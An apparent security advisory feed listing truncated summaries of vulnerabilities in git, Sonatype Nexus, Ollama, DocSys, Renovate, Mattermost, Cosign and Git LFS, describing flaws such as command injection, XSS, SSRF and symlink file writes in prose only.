CLSA-2026-1768392809 git: Fix of CVE-2024-32021

CVE-2024-32021: fix symlink vulnerability allowing creation of hardlinks to arbitrary files in local source repository cloning...

Sonatype Nexus Repository 安全漏洞

Sonatype Nexus Repository is a repository manager from Sonatype, Inc. that is used to manage, store, and distribute software, among other things. A security vulnerability exists in Sonatype Nexus Repository that stems from insufficient cleaning and escaping of request parameters, which could lead...

Sonatype Nexus Repository 安全漏洞

Sonatype Nexus Repository is a repository manager from Sonatype, Inc. that is used for managing, storing, and distributing software, among other things. A security vulnerability exists in Sonatype Nexus Repository 3 3.0.0 and later versions, which stems from improper validation of proxy repositor...

PT-2026-2975

Ollama has missing authentication enabling attackers to perform model management operations in github.com/ollama/ollama...

PT-2026-2963

Name of the Vulnerable Software and Affected Versions Nexus Repository 3 affected versions not specified Description A reflected cross-site scripting issue exists that could allow attackers to execute JavaScript code in a user's browser. This requires a crafted request and user interaction. The...

PT-2026-2966

Name of the Vulnerable Software and Affected Versions Sonatype Nexus Repository versions 3.0.0 and later Description A Server-Side Request Forgery SSRF issue exists in Sonatype Nexus Repository. Authenticated administrators can configure proxy repositories with URLs that may access unintended...

CVE-2025-15493

A flaw has been found in RainyGao DocSys up to 2.02.36. The impacted element is an unknown function of the file src/com/DocSystem/mapping/ReposAuthMapper.xml. Executing a manipulation of the argument searchWord can lead to sql injection. It is possible to launch the attack remotely. The exploit h...

Arbitrary Command Injection

Overview renovate is a dependency updater. Affected versions of this package are vulnerable to Arbitrary Command Injection due to the improper sanitazation of user-supplied repository in the Chart.yaml file in the helmv3 manager. An attacker can execute arbitrary commands on the host system by...

GHSA-3F44-XW83-3PMG Renovate vulnerable to arbitrary command injection via helmv3 manager and malicious Chart.yaml file

Summary The user-provided string repository in the helmv3 manager is appended to the helm registry login command without proper sanitization. Details Adversaries can provide a maliciously crafted Chart.yaml in conjunctions with a tweaked Renovate configuration file to trick Renovate to execute...

Renovate vulnerable to arbitrary command injection via kustomize manager and malicious helm repository

Summary The user-provided chart name in the kustomize manager is appended to the helm pull --untar command without proper sanitization. Details Adversaries can provide a maliciously crafted kustomization.yaml in conjunction with a Helm repo's index.yaml file to trick Renovate to execute arbitrary...

GHSA-XV56-3WQ5-9997 Renovate vulnerable to arbitrary command injection via kustomize manager and malicious helm repository

Summary The user-provided chart name in the kustomize manager is appended to the helm pull --untar command without proper sanitization. Details Adversaries can provide a maliciously crafted kustomization.yaml in conjunction with a Helm repo's index.yaml file to trick Renovate to execute arbitrary...

Arbitrary Command Injection

Overview renovate is a dependency updater. Affected versions of this package are vulnerable to Arbitrary Command Injection due to the improper sanitazation of user-supplied chart name in the helmRepositoryArgs function of kustomize manager. An attacker can execute arbitrary commands on the host...

EUVD-2026-2097

Renovate vulnerable to arbitrary command injection via kustomize manager and malicious helm repository...

GO-2026-4297 Mattermost Server has intermittent Authorization bypass for resource-owners in github.com/mattermost/mattermost-server

Mattermost Server has intermittent Authorization bypass for resource-owners in github.com/mattermost/mattermost-server...

GO-2026-4302 Mattermost Server vulnerable to XSS via an uploaded file in github.com/mattermost/mattermost-server

Mattermost Server vulnerable to XSS via an uploaded file in github.com/mattermost/mattermost-server...

GHSA-WHQX-F9J3-CH6M Cosign verification accepts any valid Rekor entry under certain conditions

Impact A Cosign bundle can be crafted to successfully verify an artifact even if the embedded Rekor entry does not reference the artifact's digest, signature or public key. When verifying a Rekor entry, Cosign verifies the Rekor entry signature, and also compares the artifact's digest, the user's...

git-lfs: Git LFS may write to arbitrary files via crafted symlinks

A flaw was found in Git LFS. Running git lfs checkout and git lfs pull in a specially crafted repository, specifically with symbolic or hard links tracked by Git LFS and pointing to files outside the working tree or in a bare repository, can cause Git LFS to write to arbitrary file system locatio...

CGA-XF2G-5M8V-CXW5

Bulletin has no description...

git-lfs: Git LFS may write to arbitrary files via crafted symlinks

A flaw was found in Git LFS. Running git lfs checkout and git lfs pull in a specially crafted repository, specifically with symbolic or hard links tracked by Git LFS and pointing to files outside the working tree or in a bare repository, can cause Git LFS to write to arbitrary file system locatio...

git-lfs: Git LFS may write to arbitrary files via crafted symlinks

A flaw was found in Git LFS. Running git lfs checkout and git lfs pull in a specially crafted repository, specifically with symbolic or hard links tracked by Git LFS and pointing to files outside the working tree or in a bare repository, can cause Git LFS to write to arbitrary file system locatio...